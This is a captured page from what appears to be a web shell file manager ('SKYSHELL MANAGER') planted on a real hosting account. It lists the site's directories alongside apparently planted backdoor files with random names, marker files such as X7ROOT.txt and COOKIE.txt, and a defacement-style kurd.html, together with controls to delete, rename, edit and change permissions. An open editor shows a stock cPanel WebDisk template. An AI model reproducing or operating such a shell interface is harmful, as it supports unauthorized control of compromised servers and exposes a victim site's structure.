📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: doaddwebdav.html.tt
[% SET CPANEL.CPVAR.dprefix = "../" %] [% SET addwebdisk = Api2.exec("WebDisk", "addwebdisk", {"enabledigest"=>FORM.enabledigest, "domain"=>FORM.domain, "password"=>FORM.password, "user"=>FORM.user, "perms"=>FORM.perms, "homedir"=>FORM.homedir} ); IF addwebdisk.size; SET add_disk_res = addwebdisk.0.login ; END; SET is_valid = (CPANEL.CPERROR.webdisk == '' && add_disk_res != ''); %] [% js_code = PROCESS js_block %] [% css_code = PROCESS css_block %] [% WRAPPER '_assets/master.html.tt' app_key = 'web_disk' feature = 'webdisk' include_legacy_stylesheets = 1 include_legacy_scripts = 1 include_cjt = 1 page_js = js_code page_styles = css_code -%] <div class="body-content"> <div id="message"></div> [% IF !CPANEL.CPERROR.webdisk %] <script type="text/plain" id="success_message"> [% locale.maketext("You successfully created the “[_1]” Web Disk account.", FORM.user _ "@" _ FORM.domain) %] <div> <ul> {list} </ul> </div> </script> <script type="text/plain" id="success_message_readonly"> <li> [% locale.maketext("Read-Only access to: [_1]",FORM.homedir) %] </li> </script> <script type="text/plain" id="success_message_readwrite"> <li> [% locale.maketext("Read-Write access to: [_1]",FORM.homedir) %] </li> </script> <script type="text/plain" id="success_message_digeston"> <li> [% locale.maketext("Digest Authentication is enabled.") %] </li> </script> <script type="text/plain" id="success_message_digestoff"> <li> [% locale.maketext("Digest Authentication is disabled.") %] </li> </script> [% END %] <div id='webdav_security_notices'></div> <div id="access_web_disk" style="display: none;"> <div> <p> [% locale.maketext("To view configuration details for your Web Disk Account, click “[output,strong,_1]“ below.", locale.maketext('Configure Client Access')) %] </p> [% IF !(CPANEL.ENV.HTTP_PROXIED) %] [% Api1.pre_exec("ProxyUtils", "proxyaddress"); Api1.exec("ProxyUtils", "proxyaddress", ["webdisk"]); Api1.post_exec("ProxyUtils", "proxyaddress"); %] <a title="[% locale.maketext("Click to view configuration details for your operating system or device.") %]" href="webdavaccessdownload.html?domain=[% CPANEL.CPVAR.new_proxy_domain.html() %]&sslport=[% ExpVar.expand('$sslhttpdport') %]&mainport=[% ExpVar.expand('$mainhttpdport') %]&hasdigest=[% FORM.enabledigest %]&user=[% FORM.user _ "@" _ FORM.domain %]" class="btn btn-primary" id="accessWebDisk">[% locale.maketext("Configure Client Access") %]</a> [% ELSE %] <a title="[% locale.maketext("Click to view configuration details for your operating system or device.") %]" href="webdavaccessdownload.html?domain=[% FORM.domain %]&sslport=2078&mainport=2077&hasdigest=[% FORM.enabledigest %]&user=[% FORM.user _ "@" _ FORM.domain %]" class="btn btn-primary" id="btnAccessWebDisk">[% locale.maketext("Configure Client Access") %]</a> [% END %] </div> </div> [% INCLUDE _assets/return_link.html.tt return_location='accounts_webdav.html' return_link_text=locale.maketext('Go Back') %] </div> <script type="text/plain" id="failed_message"> [% locale.maketext("There was a problem creating your Web Disk.") %] [% IF CPANEL.CPERROR.webdisk %] [% CPANEL.CPERROR.webdisk.html() %] [% END %] </script> <script type="text/html" id="security_notice"> <p id="descSecurityNotice1">[% locale.maketext("When creating a Web Disk inside of the [output,strong,public_html] directory or any other public directory, the files uploaded to that directory are publicly accessible. If you want to keep your files private, you should use a directory that is not contained within any public directory or password protect the directory.") %]</p> <p id="descSecurityNotice2">[% locale.maketext("[output,strong,Note]: To password protect directories that are inside public_html, go to the [output,url,_1,Directory Privacy] area.","../htaccess/dohtaccess.html?dir=" _ CPANEL.homedir _ "/" _ FORM.homedir) %]</p> </script> [% END %] [% BLOCK css_block %] <style type="text/css"> #access_web_disk, #webdav_security_notices { margin-top:15px; } </style> [% END %] [% BLOCK js_block %] <script type="text/javascript"> /** * Initializes the fpage * @method initializePage */ function initializePage() { var hasError = [% (is_valid) ? 'false' : 'true' %]; var text = ""; var perms = [% RAW_FORM.perms.json() || 'null' %]; var hasDigest = [% (RAW_FORM.enabledigest == "") ? 'false' : 'true' %]; if(hasError) { text = DOM.get("failed_message").text; } else { text = DOM.get("success_message").text; var list = ""; if(perms !== null && perms == 'rw') { list += DOM.get("success_message_readwrite").text; } else { list += DOM.get("success_message_readonly").text; } if(hasDigest) { list += DOM.get("success_message_digeston").text; } else { list += DOM.get("success_message_digestoff").text; } text = text.replace('{list}', list); // show the info notice if we do not have an error YAHOO.util.Dom.setStyle('access_web_disk','display',''); var info = new CPANEL.widgets.Page_Notice( { level: "info", content: DOM.get("security_notice").text, container: 'webdav_security_notices' } ); } var notice = new CPANEL.widgets.Page_Notice( { level: hasError ? "error" : "success", content: text, container: 'message' } ); } /** * Shows the current element. * @method show * @param {String|HTMLElement} el element to show * @param {String} display_type optional, alternative display type if the default is not desired */ var show = function(el, display_type) { display_type = display_type || ''; DOM.setStyle(el, 'display', display_type); } /** * Hides the current element. * @method hide * @param {String|HTMLElement} el element to hide */ var hide = function(el) { DOM.setStyle(el, 'display', 'none'); } // Initialize the page YAHOO.util.Event.onDOMReady(function(){ initializePage(); }); </script> [% END %]
Save